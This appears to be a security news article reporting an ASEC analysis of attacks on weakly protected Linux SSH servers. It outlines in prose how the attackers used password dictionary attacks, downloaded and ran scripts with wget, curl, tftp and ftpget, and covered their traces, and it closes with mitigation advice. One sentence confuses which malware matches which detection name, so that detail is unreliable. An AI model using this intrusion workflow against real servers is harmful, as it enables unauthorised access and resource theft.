A recent attack campaign targeting inadequately secured Linux SSH servers has been identified by researchers, shedding light on the use of Supershell, a cross-platform reverse shell backdoor written in Go, which grants attackers remote control over compromised systems.
After the initial infiltration, the attackers are believed to have deployed scanners to pinpoint additional vulnerable targets, followed by launching dictionary attacks using credentials obtained from the compromised systems.
A list of threat actor IP addresses and corresponding root credentials have been uncovered, including common passwords like “root/password” and “root/123456789,” frequently exploited by attackers to gain unauthorized access to vulnerable systems.
The presence of such credentials on compromised devices signifies a significant security risk, as they can be used to execute malicious activities, pilfer sensitive information, and disrupt operations. Hence, the identification and mitigation of these vulnerabilities are imperative to safeguard systems from potential threats.
The threat actor employed various techniques to download and execute malicious scripts post-compromise. Through leveraging wget, curl, tftp, and ftpget commands, the attacker downloaded scripts from multiple sources such as web servers, FTP servers, and even non-standard ports.
Subsequently, the downloaded scripts were executed using shell commands (sh, bash), providing the attacker with remote access and potentially facilitating the installation of additional malware. Following this, attempts were made to erase traces of the attack by deleting the downloaded scripts and other associated files.
Initially installed on a poorly managed Linux system, the obfuscated Supershell backdoor offers the attacker remote control capabilities, evident from its internal strings, behavior, and execution logs. While the primary goal appears to be control hijacking, there exists a possibility that the attacker also aims to install a cryptocurrency miner like XMRig to exploit the system’s resources for personal gain, aligning with common attack patterns targeting vulnerable Linux systems.
Threat actors are exploiting vulnerable Linux SSH servers by deploying the Supershell backdoor, enabling remote control of infected systems, potentially resulting in data theft, system compromise, and other nefarious activities. According to ASEC, administrators should prioritize strong password hygiene, regular updates, and robust security measures like firewalls to mitigate this threat effectively. Additionally, ensuring that V3 is up-to-date is crucial to thwart malware infections.
The detected malware includes a Cobalt Strike backdoor, a shell agent downloader, and an ElfMiner downloader, with the latter identified as Backdoor/Linux.CobaltStrike.3753120, likely deployed for remote access and control. The shell agent downloader, Downloader/Shell.Agent.SC203780, was designed to download and execute additional malicious payloads. The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was presumably utilized to download and install cryptocurrency mining malware.
By implementing these countermeasures, organizations can significantly reduce their vulnerability to Supershell attacks and fortify their cybersecurity defenses against evolving threats in the digital landscape.